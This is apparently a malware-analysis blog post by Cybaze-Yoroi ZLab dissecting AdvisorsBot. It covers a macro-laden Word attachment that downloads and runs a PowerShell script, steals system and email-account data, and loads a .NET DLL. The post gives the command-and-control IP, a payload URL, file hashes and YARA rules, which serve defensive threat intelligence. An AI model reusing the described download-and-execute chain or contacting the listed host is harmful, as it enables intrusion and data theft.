The return of AdvisorsBot

Introduction

In the past days, a new particular sample has been analyzed by the researchers of Cybaze- Yoroi ZLab. As usual, the malware looks like a legitimate e-mail attachment, named as “invoice.doc”. Today, weaponized microsoft office documents with macros, are one of the most common and more effective methods to deliver malware, because they also rely on simple social engineering tricks to lure users to enable them.

The following figure shown a workflow of the infection chain:

Figure 1 – Malware’s workflow

Technical analysis

HashSha 256:a3088d98d46a7202edeafeb744dbd822c647c72ce0d3949f895106ff3e201c9c
ThreatDropper
Briefinvoice(7).doc
ssdeep3072:tg919RZTg8X+H4u7sFYv3Rtf7XZ7PE1MbXEy271G5FZy+1OhV5biqb09H/TrN1Wk:8iqYph1Q5O3

Table 1 –   Dropper information

HashSha 256:62a7423f2ac8d80caa35fc3613b0cc6e01b22a7cb5e898176f4f42c3cf9f20be
Threatpowershell script
Briefokzjtag.png (dropper/payload)
ssdeep192:I6P2ZF0tX6vYhscXNtP++l3p2RwPNtOZE9yHPKR4EJxT/7MZUJn7rW0v:I6P+F4ac3aRwP7d9Ic4EJxT/gZEXWq

Table 2 – Fake PNG, powershell script information

Once opened, the document kindly asks to the users to enable the macro scripts, heavily obfuscated to avoid static detection.

Figure 2 – Document view inviting to enable macro

The macro code downloads a text string through a WebClient object invoked from the powershell console, then it saves it with .png file extension and run it through the “iex” primitive.

Figure 3 – Piece of VBS script that starts malware infection

This script contains different base64 encoded chunks of data, as show in the following figure.

Figure 4 – Piece of code in Base64 encoded inside fake PNG image

The deobfuscation of the first chunk reveals the ip of the C2. This address is the same used to download the whole script.

Figure 5 – Deobfuscated C2’s IP

The second piece of script labeled with “$jdH9C” is a compressed GzipStream object. After its decoding we noticed an executable file is stored within the memory stream:

Figure 6 – DLL hardcoded inside fake PNG script

The analysis of this binary is reported in the next paragraph (see “DLL Analysis”).

The latest base64 chunk is directly executed through “iex” primitive. It’s interesting to notice it calls some “non-library” functions; functions loaded from the previously referenced dll file.

Within this script, we noticed a routine named “nvtTvqn” able to gather information about victim machine.

Figure 7 – System information stealed by malware

It retrieves:

  1. System Info;
  2. Computer IP address;
  3. Network status;
  4. List of running processes;
  5. Available privileges;
  6. Usernames;
  7. Domain Admins;
  8. File on desktop machine;
  9. AntiVirus product on computer.

Other interesting function is “j2aYhH”:

Figure 8 – Accounts and emails stealing

This function searches for all email accounts registered on victim machine. Inside its code another routine named “CR1Z” is references, this one is able to verify the presence of Outlook client installed.

Figure 9 – Register key searched by malware

DLL Analysis

As described in the previous paragraph, the powershell script uses exported function from the executable.

HashSha 256:5bed1e16ec8177c92265ccfaf29666ed29b3f65f17d040a4ff356e70551d3ef0
ThreatMalware payload containing some malicious function invoked by Powershell script
Brief*.dll file (Payload)
ssdeep96:+8irQu26Iu2X/lZxvXZ31n2G1QmAPuvEHNeSPKw+1sxXt/WxJtMkQRO7j+gqT:+PRoViGOmFvEHNeSCp1sxdumkQbl

Table 3 – DLL information

The file is a dynamic linked library not already known to major security platforms.

Figure 10 – DLL results on Virus Total

The library embeds MSIL code running on top of the .NET framework, so it is quite straightforward to recover its source code.

Figure 11 – Static analysis on DLL

The extracted code contains utility functions used for many purposes: for instance to generate pseudo-random installation path.

Figure 12 – Source code of function in DLL

Instead, the “kaYchi” function accepts three parameters, id, status and post, and creates files with two different extensions: “*.asp” if “post” variable is true and “*.jpg” otherwise.

Figure 13 – Function to generate .asp or .jpg file to write/send victim information to C2

The remote command and control server (162.244.32.180) was down at time of writing. After described steps, malware try to download other components from it and execute them with “iex” primitive

Last DNS activity was in December 2018. This IP is already know at scientific community and labeled as malicious. The IP is located in US how visible in the following figures.

Figure 14 – previous DNS of C2
Figure 15 – C2’s relation graph

The domain zosmogroel.com was active until 18-12-2018 we also found an associated certificate with the SHA-1 signature 98b637715fa6429a60eed9b58447e967bf7e1018

Figure 16 – zosmogroel.com certificate

This signature was associated with more than 80 IP addresses, further analysis reveals that those ips reveal how some of them have been used as dropurls for other malware samples.

The analyzed sample is AdvisorsBot, first analyzed by Proofpoint on 23 August 2018, we also found evidences on a public sandbox that the 162.244.32.180 remote C2 on last August deliver a Ursnif/Gozi Variant 162.244.32.180/yak0810.exe with the following sha256 030531a784f72f145bef98a3240283da88fe623904c066be179fbbe3a9150c48

as also confirmed by signatures on VT. This last evidence may suggest that this infrastructure was used to deliver different malware.

Conclusions

Weaponized Microsoft Office documents delivered via email represent the top infection vector in today malware landscape, at the second place we found the abusing of Microsoft DDE protocol  with CVE-2017-11882. One reason is that, very often, macro malware does not rely on most-expensive-to-deploy 0-day exploit  and could bypass end-point security solution (macro are often whitelisted in enterprise environment) due to extensive utilization of multi-layered obfuscation mainly in powershell, broadly speaking with a very low barrier-to-entry.

Several APT’s today  are using spear-phishing mail with weaponized office document as an attachment, just to name few ones OilRIG APT have used BondUpdated in a campaign discovered by Fireeye in 2017 targeted a different Middle Eastern governmental organization with a malicious VBA macro that download a 2-stage powershell.

Similar vector was used in recents APT28 campaign targeting individuals with a specific interest in the CyCon US cybersecurity conference organized by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) The attackers didn’t use any zero-day vulnerabilities in this campaign, instead, they relied on weaponized Office documents containing VBA scripts used to deliver a new variant of Seduploader. Also TURLA APT use weaponized document in their recent campaigns to deliver KopiLuwak with heavily obfuscated Javascript payload.

This sample show an high level of obfuscation to defeat AV and does not use any exploit, in fact, the obfuscated DLL component was not flagged by VT(0/60) at the time of writing. Unfortunately we can not carry on the analysis because the C2 is not reachable yet, but we noticed that last DNS activity was in December 2018 with the registration of 2 distinct domains active for 1 week each one (and several domains before), assuming that, this malware was developed to be used in target-specific activities tightening the time window to a minimum each time. Further analysis on these registered domains suggest us that the whole infrastructure used is big enough (88 IP’s founded) and it may have also been used to deliver other malware.

Researcher of Cybaze-Yoroi ZLAB advice to disable macros by default and check the origin of the email in depth.

Indicator of Compromise

  • Dropsite:
    • 162.244.32[.180
  • C2:
    • 162.244.32[.180
  • Hash:
    • a3088d98d46a7202edeafeb744dbd822c647c72ce0d3949f895106ff3e201c9c
    • 62a7423f2ac8d80caa35fc3613b0cc6e01b22a7cb5e898176f4f42c3cf9f20be
    • 5bed1e16ec8177c92265ccfaf29666ed29b3f65f17d040a4ff356e70551d3ef0

Yara rules

rule ps_dropper_29_01_2019{

	meta:
  	description = "Yara Rule for ps_dropper"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_01_29"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a = "nubiunddd"
    		$b = {40 03 92 DA 05 60 CE 13 38}
   		$c = {81 42 2A 08 43 4A 1C 00}
    		$d = {D0 CF}

	condition:
    	all of them
}


rule extracted_dll_29_01_2019{

	meta:
  	description = "Yara Rule for extracted_dll"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_01_29"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a = {4D 5A}
    		$b = {61 00 73 00 70 00 00 09 2E 00 6A 00 70 00 67}
   		$c = "tools.dll"
   		$d = {54 43 77 77 00 6A 79 35}

	condition:
    	all of them
}

rule image_script_29_01_2019{

	meta:
  	description = "Yara Rule for image_script"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_01_29"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a = "MTYyLjI0NC4zMi4xODA="
    		$b = "oiiTPUErt"
   		$c = "iQ2xpZW50KSVc"
   		$d = "$sIS8cqNJ13x"

	condition:
    	$a or $d or $b and $c  
}

This blog post was authored by Davide Testa, Luigi Martire, Antonio Farina and Antonio Pirozzi of Cybaze-Yoroi Z-LAB